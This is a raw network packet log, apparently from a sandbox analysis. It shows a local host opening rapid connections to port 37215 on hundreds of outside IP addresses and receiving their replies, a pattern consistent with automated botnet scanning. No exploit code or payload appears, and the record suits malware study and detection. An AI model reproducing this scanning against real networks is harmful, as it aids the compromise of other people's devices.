                                                        Jun 13, 2024 21:31:59.266499043 CEST3721544838156.234.131.16192.168.2.14
                                                        Jun 13, 2024 21:31:59.266539097 CEST4483837215192.168.2.14156.234.131.16
                                                        Jun 13, 2024 21:31:59.266772032 CEST372154848441.11.160.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.266812086 CEST4848437215192.168.2.1441.11.160.248
                                                        Jun 13, 2024 21:31:59.267148018 CEST3721540952156.14.18.99192.168.2.14
                                                        Jun 13, 2024 21:31:59.267189026 CEST4095237215192.168.2.14156.14.18.99
                                                        Jun 13, 2024 21:31:59.267421961 CEST372155549441.84.165.58192.168.2.14
                                                        Jun 13, 2024 21:31:59.267473936 CEST5549437215192.168.2.1441.84.165.58
                                                        Jun 13, 2024 21:31:59.267832994 CEST372155454641.91.46.56192.168.2.14
                                                        Jun 13, 2024 21:31:59.267884016 CEST5454637215192.168.2.1441.91.46.56
                                                        Jun 13, 2024 21:31:59.267961025 CEST3721559702156.93.196.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.268002987 CEST5970237215192.168.2.14156.93.196.251
                                                        Jun 13, 2024 21:31:59.268290997 CEST372154005041.17.85.190192.168.2.14
                                                        Jun 13, 2024 21:31:59.268337011 CEST4005037215192.168.2.1441.17.85.190
                                                        Jun 13, 2024 21:31:59.268609047 CEST3721545886156.167.30.215192.168.2.14
                                                        Jun 13, 2024 21:31:59.268651962 CEST4588637215192.168.2.14156.167.30.215
                                                        Jun 13, 2024 21:32:00.209191084 CEST1260337215192.168.2.14156.162.190.12
                                                        Jun 13, 2024 21:32:00.209192038 CEST1260337215192.168.2.14197.48.241.153
                                                        Jun 13, 2024 21:32:00.209191084 CEST1260337215192.168.2.14156.20.102.181
                                                        Jun 13, 2024 21:32:00.209191084 CEST1260337215192.168.2.14197.202.165.217
                                                        Jun 13, 2024 21:32:00.209191084 CEST1260337215192.168.2.14156.126.111.142
                                                        Jun 13, 2024 21:32:00.209191084 CEST1260337215192.168.2.14156.193.243.130
                                                        Jun 13, 2024 21:32:00.209192038 CEST1260337215192.168.2.1441.26.79.229
                                                        Jun 13, 2024 21:32:00.209192038 CEST1260337215192.168.2.1441.153.23.133
                                                        Jun 13, 2024 21:32:00.209192038 CEST1260337215192.168.2.1441.183.243.254
                                                        Jun 13, 2024 21:32:00.209192038 CEST1260337215192.168.2.14156.57.126.92
                                                        Jun 13, 2024 21:32:00.209196091 CEST1260337215192.168.2.1441.116.218.225
                                                        Jun 13, 2024 21:32:00.209197044 CEST1260337215192.168.2.1441.216.57.211
                                                        Jun 13, 2024 21:32:00.209197044 CEST1260337215192.168.2.14197.220.42.12
                                                        Jun 13, 2024 21:32:00.209197044 CEST1260337215192.168.2.1441.65.222.54
                                                        Jun 13, 2024 21:32:00.209197044 CEST1260337215192.168.2.14156.115.77.90
                                                        Jun 13, 2024 21:32:00.209197044 CEST1260337215192.168.2.14197.109.98.211
                                                        Jun 13, 2024 21:32:00.209275007 CEST1260337215192.168.2.1441.253.1.253
                                                        Jun 13, 2024 21:32:00.209275961 CEST1260337215192.168.2.14197.151.60.93
                                                        Jun 13, 2024 21:32:00.209275007 CEST1260337215192.168.2.14156.51.73.140
                                                        Jun 13, 2024 21:32:00.209275961 CEST1260337215192.168.2.14197.11.254.119
                                                        Jun 13, 2024 21:32:00.209275007 CEST1260337215192.168.2.14197.106.84.205
                                                        Jun 13, 2024 21:32:00.209275961 CEST1260337215192.168.2.14197.221.212.245
                                                        Jun 13, 2024 21:32:00.209275007 CEST1260337215192.168.2.14197.20.19.32
                                                        Jun 13, 2024 21:32:00.209275007 CEST1260337215192.168.2.1441.51.209.51
                                                        Jun 13, 2024 21:32:00.209280014 CEST1260337215192.168.2.14197.79.242.20
                                                        Jun 13, 2024 21:32:00.209280014 CEST1260337215192.168.2.14156.212.38.36
                                                        Jun 13, 2024 21:32:00.209280014 CEST1260337215192.168.2.14197.57.79.65
                                                        Jun 13, 2024 21:32:00.209280968 CEST1260337215192.168.2.14197.173.171.143
                                                        Jun 13, 2024 21:32:00.209280014 CEST1260337215192.168.2.14156.7.41.9
                                                        Jun 13, 2024 21:32:00.209280968 CEST1260337215192.168.2.14156.86.152.11
                                                        Jun 13, 2024 21:32:00.209280014 CEST1260337215192.168.2.14197.99.68.176
                                                        Jun 13, 2024 21:32:00.209283113 CEST1260337215192.168.2.14156.206.120.106
                                                        Jun 13, 2024 21:32:00.209280968 CEST1260337215192.168.2.1441.159.91.0
                                                        Jun 13, 2024 21:32:00.209280014 CEST1260337215192.168.2.14197.86.45.50
                                                        Jun 13, 2024 21:32:00.209280968 CEST1260337215192.168.2.14197.194.117.63
                                                        Jun 13, 2024 21:32:00.209280968 CEST1260337215192.168.2.14197.86.184.4
                                                        Jun 13, 2024 21:32:00.209280968 CEST1260337215192.168.2.14197.136.231.200
                                                        Jun 13, 2024 21:32:00.209283113 CEST1260337215192.168.2.1441.122.183.100
                                                        Jun 13, 2024 21:32:00.209280968 CEST1260337215192.168.2.14156.248.189.91
                                                        Jun 13, 2024 21:32:00.209283113 CEST1260337215192.168.2.1441.0.119.130
                                                        Jun 13, 2024 21:32:00.209283113 CEST1260337215192.168.2.14156.109.114.102
                                                        Jun 13, 2024 21:32:00.209283113 CEST1260337215192.168.2.1441.236.151.82
                                                        Jun 13, 2024 21:32:00.209283113 CEST1260337215192.168.2.14197.33.238.134
                                                        Jun 13, 2024 21:32:00.209284067 CEST1260337215192.168.2.1441.190.81.189
                                                        Jun 13, 2024 21:32:00.209284067 CEST1260337215192.168.2.1441.13.137.193
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.78.197.236
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.1441.208.236.211
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.98.177.189
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.202.232.222
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.1441.170.24.175
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.1441.161.127.92
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.230.84.227
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.14197.102.59.48
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14197.137.90.160
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.1441.136.79.242
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.1441.170.153.182
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.217.112.178
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.53.90.107
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.209.151.245
                                                        Jun 13, 2024 21:32:00.209341049 CEST1260337215192.168.2.1441.206.185.161
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.14197.214.46.171
                                                        Jun 13, 2024 21:32:00.209341049 CEST1260337215192.168.2.1441.41.135.181
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.1441.208.29.174
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.151.238.12
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.1441.99.47.11
                                                        Jun 13, 2024 21:32:00.209336996 CEST1260337215192.168.2.14156.255.131.213
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.14197.142.10.152
                                                        Jun 13, 2024 21:32:00.209351063 CEST1260337215192.168.2.1441.69.45.122
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.14156.208.31.66
                                                        Jun 13, 2024 21:32:00.209351063 CEST1260337215192.168.2.1441.75.138.125
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.14197.6.59.7
                                                        Jun 13, 2024 21:32:00.209342003 CEST1260337215192.168.2.14197.107.126.192
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.14156.196.219.34
                                                        Jun 13, 2024 21:32:00.209342003 CEST1260337215192.168.2.14197.121.144.19
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.14156.165.103.83
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.1441.138.70.247
                                                        Jun 13, 2024 21:32:00.209351063 CEST1260337215192.168.2.14156.63.58.63
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.1441.224.22.165
                                                        Jun 13, 2024 21:32:00.209351063 CEST1260337215192.168.2.14197.142.2.12
                                                        Jun 13, 2024 21:32:00.209342003 CEST1260337215192.168.2.14197.138.128.159
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.14197.57.102.78
                                                        Jun 13, 2024 21:32:00.209351063 CEST1260337215192.168.2.14156.182.224.211
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.14156.66.66.19
                                                        Jun 13, 2024 21:32:00.209352016 CEST1260337215192.168.2.1441.128.10.150
                                                        Jun 13, 2024 21:32:00.209342003 CEST1260337215192.168.2.14197.181.148.127
                                                        Jun 13, 2024 21:32:00.209352016 CEST1260337215192.168.2.14156.32.117.115
                                                        Jun 13, 2024 21:32:00.209346056 CEST1260337215192.168.2.14156.230.229.98
                                                        Jun 13, 2024 21:32:00.209338903 CEST1260337215192.168.2.1441.79.12.106
                                                        Jun 13, 2024 21:32:00.209352016 CEST1260337215192.168.2.14156.163.132.170
                                                        Jun 13, 2024 21:32:00.209342003 CEST1260337215192.168.2.14156.10.72.236
                                                        Jun 13, 2024 21:32:00.209342003 CEST1260337215192.168.2.1441.8.81.143
                                                        Jun 13, 2024 21:32:00.209383011 CEST1260337215192.168.2.1441.36.193.183
                                                        Jun 13, 2024 21:32:00.209383011 CEST1260337215192.168.2.1441.230.52.172
                                                        Jun 13, 2024 21:32:00.209383011 CEST1260337215192.168.2.14156.250.205.241
                                                        Jun 13, 2024 21:32:00.209383011 CEST1260337215192.168.2.14156.80.77.144
                                                        Jun 13, 2024 21:32:00.209383011 CEST1260337215192.168.2.1441.126.31.120
                                                        Jun 13, 2024 21:32:00.209435940 CEST1260337215192.168.2.14156.227.127.133
                                                        Jun 13, 2024 21:32:00.209435940 CEST1260337215192.168.2.1441.250.201.251
                                                        Jun 13, 2024 21:32:00.209435940 CEST1260337215192.168.2.14156.39.242.52
                                                        Jun 13, 2024 21:32:00.209435940 CEST1260337215192.168.2.14197.24.35.193
                                                        Jun 13, 2024 21:32:00.209450960 CEST1260337215192.168.2.1441.13.134.169
                                                        Jun 13, 2024 21:32:00.209450960 CEST1260337215192.168.2.14156.49.142.156
                                                        Jun 13, 2024 21:32:00.209450960 CEST1260337215192.168.2.14156.15.57.226
                                                        Jun 13, 2024 21:32:00.209450960 CEST1260337215192.168.2.1441.3.27.154
                                                        Jun 13, 2024 21:32:00.209450960 CEST1260337215192.168.2.14156.140.147.35
                                                        Jun 13, 2024 21:32:00.209450960 CEST1260337215192.168.2.1441.164.131.110
                                                        Jun 13, 2024 21:32:00.209450960 CEST1260337215192.168.2.14197.86.129.246
                                                        Jun 13, 2024 21:32:00.209459066 CEST1260337215192.168.2.14197.212.39.176
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.1441.161.11.142
                                                        Jun 13, 2024 21:32:00.209459066 CEST1260337215192.168.2.1441.253.146.254
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14156.104.179.121
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14156.38.225.89
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14156.129.125.8
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14156.229.51.209
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.1441.197.219.42
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14156.144.164.44
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14156.29.211.164
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14156.15.6.23
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14197.234.225.61
                                                        Jun 13, 2024 21:32:00.209460020 CEST1260337215192.168.2.14197.82.80.162
                                                        Jun 13, 2024 21:32:00.209481001 CEST1260337215192.168.2.14156.42.38.198
                                                        Jun 13, 2024 21:32:00.209481001 CEST1260337215192.168.2.14197.193.22.49
                                                        Jun 13, 2024 21:32:00.209481001 CEST1260337215192.168.2.14197.196.30.151
                                                        Jun 13, 2024 21:32:00.209501028 CEST1260337215192.168.2.14197.78.135.255
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.14156.250.165.250
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.14197.242.28.191
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.14156.136.120.179
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.14197.171.134.236
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.1441.71.235.155
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.14156.212.56.208
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.14156.212.38.34
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.1441.112.83.38
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.14197.91.160.210
                                                        Jun 13, 2024 21:32:00.209532022 CEST1260337215192.168.2.14197.62.42.125
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.14156.69.155.237
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.14156.105.95.62
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.14197.47.157.38
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.1441.54.227.110
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.14197.7.174.174
                                                        Jun 13, 2024 21:32:00.209533930 CEST1260337215192.168.2.14197.14.145.195
                                                        Jun 13, 2024 21:32:00.209589958 CEST1260337215192.168.2.14197.25.0.100
                                                        Jun 13, 2024 21:32:00.209590912 CEST1260337215192.168.2.14156.81.243.146
                                                        Jun 13, 2024 21:32:00.209590912 CEST1260337215192.168.2.14197.35.14.107
                                                        Jun 13, 2024 21:32:00.209590912 CEST1260337215192.168.2.1441.179.113.114
                                                        Jun 13, 2024 21:32:00.209590912 CEST1260337215192.168.2.14197.142.5.178
                                                        Jun 13, 2024 21:32:00.209590912 CEST1260337215192.168.2.14156.80.140.185
                                                        Jun 13, 2024 21:32:00.209590912 CEST1260337215192.168.2.14197.28.31.212
                                                        Jun 13, 2024 21:32:00.209592104 CEST1260337215192.168.2.1441.206.170.161
                                                        Jun 13, 2024 21:32:00.209592104 CEST1260337215192.168.2.1441.152.186.219
                                                        Jun 13, 2024 21:32:00.209592104 CEST1260337215192.168.2.14197.175.146.61
                                                        Jun 13, 2024 21:32:00.209592104 CEST1260337215192.168.2.14156.83.248.153
                                                        Jun 13, 2024 21:32:00.209592104 CEST1260337215192.168.2.14156.211.164.13
                                                        Jun 13, 2024 21:32:00.209592104 CEST1260337215192.168.2.1441.240.242.23
                                                        Jun 13, 2024 21:32:00.209592104 CEST1260337215192.168.2.1441.202.27.57
                                                        Jun 13, 2024 21:32:00.209593058 CEST1260337215192.168.2.1441.191.15.31
                                                        Jun 13, 2024 21:32:00.209619999 CEST1260337215192.168.2.1441.244.214.253
                                                        Jun 13, 2024 21:32:00.209619999 CEST1260337215192.168.2.1441.243.200.154
                                                        Jun 13, 2024 21:32:00.209619999 CEST1260337215192.168.2.14197.158.97.75
                                                        Jun 13, 2024 21:32:00.209619999 CEST1260337215192.168.2.14156.240.71.150
                                                        Jun 13, 2024 21:32:00.209619999 CEST1260337215192.168.2.14156.232.36.71
                                                        Jun 13, 2024 21:32:00.214262009 CEST3721512603156.162.190.12192.168.2.14
                                                        Jun 13, 2024 21:32:00.214267969 CEST3721512603197.48.241.153192.168.2.14
                                                        Jun 13, 2024 21:32:00.214277029 CEST3721512603156.20.102.181192.168.2.14
                                                        Jun 13, 2024 21:32:00.214423895 CEST1260337215192.168.2.14156.162.190.12
                                                        Jun 13, 2024 21:32:00.214423895 CEST1260337215192.168.2.14156.20.102.181
                                                        Jun 13, 2024 21:32:00.214432001 CEST1260337215192.168.2.14197.48.241.153
                                                        Jun 13, 2024 21:32:00.214735985 CEST3721512603197.202.165.217192.168.2.14
                                                        Jun 13, 2024 21:32:00.214806080 CEST372151260341.26.79.229192.168.2.14
                                                        Jun 13, 2024 21:32:00.214814901 CEST3721512603156.126.111.142192.168.2.14
                                                        Jun 13, 2024 21:32:00.214823961 CEST372151260341.153.23.133192.168.2.14
                                                        Jun 13, 2024 21:32:00.214828968 CEST3721512603156.193.243.130192.168.2.14
                                                        Jun 13, 2024 21:32:00.214839935 CEST372151260341.183.243.254192.168.2.14
                                                        Jun 13, 2024 21:32:00.214842081 CEST1260337215192.168.2.14197.202.165.217
                                                        Jun 13, 2024 21:32:00.214848995 CEST3721512603156.57.126.92192.168.2.14
                                                        Jun 13, 2024 21:32:00.214853048 CEST1260337215192.168.2.1441.26.79.229
                                                        Jun 13, 2024 21:32:00.214858055 CEST372151260341.116.218.225192.168.2.14
                                                        Jun 13, 2024 21:32:00.214865923 CEST372151260341.216.57.211192.168.2.14
                                                        Jun 13, 2024 21:32:00.214867115 CEST1260337215192.168.2.14156.126.111.142
                                                        Jun 13, 2024 21:32:00.214874029 CEST1260337215192.168.2.14156.193.243.130
                                                        Jun 13, 2024 21:32:00.214879036 CEST1260337215192.168.2.1441.153.23.133
                                                        Jun 13, 2024 21:32:00.214879990 CEST1260337215192.168.2.1441.183.243.254
                                                        Jun 13, 2024 21:32:00.214879990 CEST1260337215192.168.2.14156.57.126.92
                                                        Jun 13, 2024 21:32:00.214883089 CEST3721512603197.220.42.12192.168.2.14
                                                        Jun 13, 2024 21:32:00.214884996 CEST1260337215192.168.2.1441.116.218.225
                                                        Jun 13, 2024 21:32:00.214886904 CEST372151260341.65.222.54192.168.2.14
                                                        Jun 13, 2024 21:32:00.214895964 CEST3721512603156.115.77.90192.168.2.14
                                                        Jun 13, 2024 21:32:00.214896917 CEST1260337215192.168.2.1441.216.57.211
                                                        Jun 13, 2024 21:32:00.214900017 CEST3721512603197.109.98.211192.168.2.14
                                                        Jun 13, 2024 21:32:00.214907885 CEST3721512603197.151.60.93192.168.2.14
                                                        Jun 13, 2024 21:32:00.214911938 CEST372151260341.253.1.253192.168.2.14
                                                        Jun 13, 2024 21:32:00.214920998 CEST3721512603197.11.254.119192.168.2.14
                                                        Jun 13, 2024 21:32:00.214922905 CEST1260337215192.168.2.1441.65.222.54
                                                        Jun 13, 2024 21:32:00.214922905 CEST1260337215192.168.2.14197.220.42.12
                                                        Jun 13, 2024 21:32:00.214926004 CEST3721512603156.51.73.140192.168.2.14
                                                        Jun 13, 2024 21:32:00.214930058 CEST3721512603197.221.212.245192.168.2.14
                                                        Jun 13, 2024 21:32:00.214936018 CEST3721512603197.106.84.205192.168.2.14
                                                        Jun 13, 2024 21:32:00.214936018 CEST1260337215192.168.2.14156.115.77.90
                                                        Jun 13, 2024 21:32:00.214936018 CEST1260337215192.168.2.14197.109.98.211
                                                        Jun 13, 2024 21:32:00.214940071 CEST3721512603197.20.19.32192.168.2.14
                                                        Jun 13, 2024 21:32:00.214945078 CEST372151260341.51.209.51192.168.2.14
                                                        Jun 13, 2024 21:32:00.214945078 CEST1260337215192.168.2.14197.151.60.93
                                                        Jun 13, 2024 21:32:00.214948893 CEST3721512603197.79.242.20192.168.2.14
                                                        Jun 13, 2024 21:32:00.214950085 CEST1260337215192.168.2.1441.253.1.253
                                                        Jun 13, 2024 21:32:00.214957952 CEST3721512603197.57.79.65192.168.2.14
                                                        Jun 13, 2024 21:32:00.214962959 CEST3721512603156.212.38.36192.168.2.14
                                                        Jun 13, 2024 21:32:00.214971066 CEST3721512603156.7.41.9192.168.2.14
                                                        Jun 13, 2024 21:32:00.214972973 CEST1260337215192.168.2.14197.11.254.119
                                                        Jun 13, 2024 21:32:00.214972973 CEST1260337215192.168.2.14197.221.212.245
                                                        Jun 13, 2024 21:32:00.214976072 CEST1260337215192.168.2.14156.51.73.140
                                                        Jun 13, 2024 21:32:00.214976072 CEST1260337215192.168.2.14197.106.84.205
                                                        Jun 13, 2024 21:32:00.214976072 CEST1260337215192.168.2.14197.20.19.32
                                                        Jun 13, 2024 21:32:00.214981079 CEST3721512603156.206.120.106192.168.2.14
                                                        Jun 13, 2024 21:32:00.214986086 CEST3721512603197.173.171.143192.168.2.14
                                                        Jun 13, 2024 21:32:00.214987993 CEST1260337215192.168.2.1441.51.209.51
                                                        Jun 13, 2024 21:32:00.214991093 CEST372151260341.122.183.100192.168.2.14
                                                        Jun 13, 2024 21:32:00.215018988 CEST1260337215192.168.2.14156.206.120.106
                                                        Jun 13, 2024 21:32:00.215018988 CEST1260337215192.168.2.1441.122.183.100
                                                        Jun 13, 2024 21:32:00.215085983 CEST1260337215192.168.2.14156.212.38.36
                                                        Jun 13, 2024 21:32:00.215085983 CEST1260337215192.168.2.14197.173.171.143
                                                        Jun 13, 2024 21:32:00.215089083 CEST1260337215192.168.2.14197.79.242.20
                                                        Jun 13, 2024 21:32:00.215089083 CEST1260337215192.168.2.14197.57.79.65
                                                        Jun 13, 2024 21:32:00.215089083 CEST1260337215192.168.2.14156.7.41.9
                                                        Jun 13, 2024 21:32:00.215110064 CEST3721512603156.86.152.11192.168.2.14
                                                        Jun 13, 2024 21:32:00.215116024 CEST372151260341.0.119.130192.168.2.14
                                                        Jun 13, 2024 21:32:00.215125084 CEST372151260341.159.91.0192.168.2.14
                                                        Jun 13, 2024 21:32:00.215150118 CEST1260337215192.168.2.14156.86.152.11
                                                        Jun 13, 2024 21:32:00.215150118 CEST1260337215192.168.2.1441.159.91.0
                                                        Jun 13, 2024 21:32:00.215152025 CEST1260337215192.168.2.1441.0.119.130
                                                        Jun 13, 2024 21:32:00.215202093 CEST3721512603156.109.114.102192.168.2.14
                                                        Jun 13, 2024 21:32:00.215207100 CEST372151260341.236.151.82192.168.2.14
                                                        Jun 13, 2024 21:32:00.215215921 CEST3721512603197.194.117.63192.168.2.14
                                                        Jun 13, 2024 21:32:00.215219975 CEST3721512603197.33.238.134192.168.2.14
                                                        Jun 13, 2024 21:32:00.215224028 CEST3721512603197.86.184.4192.168.2.14
                                                        Jun 13, 2024 21:32:00.215228081 CEST372151260341.190.81.189192.168.2.14
                                                        Jun 13, 2024 21:32:00.215236902 CEST3721512603197.136.231.200192.168.2.14
                                                        Jun 13, 2024 21:32:00.215240955 CEST372151260341.13.137.193192.168.2.14
                                                        Jun 13, 2024 21:32:00.215245008 CEST3721512603156.248.189.91192.168.2.14
                                                        Jun 13, 2024 21:32:00.215248108 CEST3721512603197.99.68.176192.168.2.14
                                                        Jun 13, 2024 21:32:00.215249062 CEST1260337215192.168.2.14197.194.117.63
                                                        Jun 13, 2024 21:32:00.215251923 CEST3721512603197.86.45.50192.168.2.14
                                                        Jun 13, 2024 21:32:00.215254068 CEST1260337215192.168.2.1441.236.151.82
                                                        Jun 13, 2024 21:32:00.215254068 CEST1260337215192.168.2.14156.109.114.102
                                                        Jun 13, 2024 21:32:00.215254068 CEST1260337215192.168.2.14197.33.238.134
                                                        Jun 13, 2024 21:32:00.215257883 CEST1260337215192.168.2.14197.86.184.4
                                                        Jun 13, 2024 21:32:00.215260983 CEST3721512603156.78.197.236192.168.2.14
                                                        Jun 13, 2024 21:32:00.215265989 CEST3721512603156.98.177.189192.168.2.14
                                                        Jun 13, 2024 21:32:00.215266943 CEST1260337215192.168.2.1441.190.81.189
                                                        Jun 13, 2024 21:32:00.215266943 CEST1260337215192.168.2.1441.13.137.193
                                                        Jun 13, 2024 21:32:00.215267897 CEST1260337215192.168.2.14197.136.231.200
                                                        Jun 13, 2024 21:32:00.215267897 CEST1260337215192.168.2.14156.248.189.91
                                                        Jun 13, 2024 21:32:00.215270996 CEST372151260341.170.24.175192.168.2.14
                                                        Jun 13, 2024 21:32:00.215275049 CEST372151260341.208.236.211192.168.2.14
                                                        Jun 13, 2024 21:32:00.215279102 CEST3721512603197.137.90.160192.168.2.14
                                                        Jun 13, 2024 21:32:00.215281963 CEST1260337215192.168.2.14197.99.68.176
                                                        Jun 13, 2024 21:32:00.215281963 CEST1260337215192.168.2.14197.86.45.50
                                                        Jun 13, 2024 21:32:00.215282917 CEST3721512603156.202.232.222192.168.2.14
                                                        Jun 13, 2024 21:32:00.215287924 CEST372151260341.170.153.182192.168.2.14
                                                        Jun 13, 2024 21:32:00.215297937 CEST3721512603156.53.90.107192.168.2.14
                                                        Jun 13, 2024 21:32:00.215306044 CEST1260337215192.168.2.14156.98.177.189
                                                        Jun 13, 2024 21:32:00.215306044 CEST1260337215192.168.2.14156.78.197.236
                                                        Jun 13, 2024 21:32:00.215306044 CEST1260337215192.168.2.1441.170.24.175
                                                        Jun 13, 2024 21:32:00.215315104 CEST1260337215192.168.2.14197.137.90.160
                                                        Jun 13, 2024 21:32:00.215322018 CEST1260337215192.168.2.1441.170.153.182
                                                        Jun 13, 2024 21:32:00.215317011 CEST1260337215192.168.2.1441.208.236.211
                                                        Jun 13, 2024 21:32:00.215322018 CEST1260337215192.168.2.14156.53.90.107
                                                        Jun 13, 2024 21:32:00.215317011 CEST1260337215192.168.2.14156.202.232.222
                                                        Jun 13, 2024 21:32:00.215331078 CEST372151260341.99.47.11192.168.2.14
                                                        Jun 13, 2024 21:32:00.215337038 CEST3721512603156.230.84.227192.168.2.14
                                                        Jun 13, 2024 21:32:00.215344906 CEST3721512603156.217.112.178192.168.2.14
                                                        Jun 13, 2024 21:32:00.215370893 CEST1260337215192.168.2.1441.99.47.11
                                                        Jun 13, 2024 21:32:00.215380907 CEST1260337215192.168.2.14156.230.84.227
                                                        Jun 13, 2024 21:32:00.215380907 CEST1260337215192.168.2.14156.217.112.178
                                                        Jun 13, 2024 21:32:00.215387106 CEST3721512603197.214.46.171192.168.2.14
                                                        Jun 13, 2024 21:32:00.215392113 CEST3721512603156.209.151.245192.168.2.14
                                                        Jun 13, 2024 21:32:00.215401888 CEST3721512603156.208.31.66192.168.2.14
                                                        Jun 13, 2024 21:32:00.215405941 CEST372151260341.206.185.161192.168.2.14
                                                        Jun 13, 2024 21:32:00.215409994 CEST372151260341.161.127.92192.168.2.14
                                                        Jun 13, 2024 21:32:00.215419054 CEST3721512603156.196.219.34192.168.2.14
                                                        Jun 13, 2024 21:32:00.215421915 CEST372151260341.69.45.122192.168.2.14
                                                        Jun 13, 2024 21:32:00.215431929 CEST1260337215192.168.2.14197.214.46.171
                                                        Jun 13, 2024 21:32:00.215431929 CEST1260337215192.168.2.14156.208.31.66
                                                        Jun 13, 2024 21:32:00.215439081 CEST1260337215192.168.2.14156.209.151.245
                                                        Jun 13, 2024 21:32:00.215442896 CEST1260337215192.168.2.1441.206.185.161
                                                        Jun 13, 2024 21:32:00.215442896 CEST1260337215192.168.2.1441.161.127.92
                                                        Jun 13, 2024 21:32:00.215461016 CEST1260337215192.168.2.14156.196.219.34
                                                        Jun 13, 2024 21:32:00.215461016 CEST1260337215192.168.2.1441.69.45.122
                                                        Jun 13, 2024 21:32:00.215735912 CEST372151260341.41.135.181192.168.2.14
                                                        Jun 13, 2024 21:32:00.215740919 CEST3721512603156.165.103.83192.168.2.14
                                                        Jun 13, 2024 21:32:00.215749979 CEST3721512603197.102.59.48192.168.2.14
                                                        Jun 13, 2024 21:32:00.215753078 CEST372151260341.36.193.183192.168.2.14
                                                        Jun 13, 2024 21:32:00.215761900 CEST3721512603156.151.238.12192.168.2.14
                                                        Jun 13, 2024 21:32:00.215765953 CEST3721512603197.107.126.192192.168.2.14
                                                        Jun 13, 2024 21:32:00.215774059 CEST372151260341.224.22.165192.168.2.14
                                                        Jun 13, 2024 21:32:00.215779066 CEST372151260341.75.138.125192.168.2.14
                                                        Jun 13, 2024 21:32:00.215781927 CEST1260337215192.168.2.14156.165.103.83
                                                        Jun 13, 2024 21:32:00.215785980 CEST1260337215192.168.2.1441.36.193.183
                                                        Jun 13, 2024 21:32:00.215786934 CEST1260337215192.168.2.14197.102.59.48
                                                        Jun 13, 2024 21:32:00.215789080 CEST1260337215192.168.2.1441.41.135.181
                                                        Jun 13, 2024 21:32:00.215792894 CEST372151260341.230.52.172192.168.2.14
                                                        Jun 13, 2024 21:32:00.215799093 CEST3721512603156.255.131.213192.168.2.14
                                                        Jun 13, 2024 21:32:00.215806007 CEST1260337215192.168.2.1441.224.22.165
                                                        Jun 13, 2024 21:32:00.215807915 CEST3721512603197.121.144.19192.168.2.14
                                                        Jun 13, 2024 21:32:00.215809107 CEST1260337215192.168.2.14197.107.126.192
                                                        Jun 13, 2024 21:32:00.215810061 CEST1260337215192.168.2.1441.75.138.125
                                                        Jun 13, 2024 21:32:00.215814114 CEST3721512603197.57.102.78192.168.2.14
                                                        Jun 13, 2024 21:32:00.215815067 CEST1260337215192.168.2.14156.151.238.12
                                                        Jun 13, 2024 21:32:00.215826035 CEST372151260341.136.79.242192.168.2.14
                                                        Jun 13, 2024 21:32:00.215827942 CEST1260337215192.168.2.1441.230.52.172
                                                        Jun 13, 2024 21:32:00.215835094 CEST3721512603156.250.205.241192.168.2.14
                                                        Jun 13, 2024 21:32:00.215836048 CEST1260337215192.168.2.14156.255.131.213
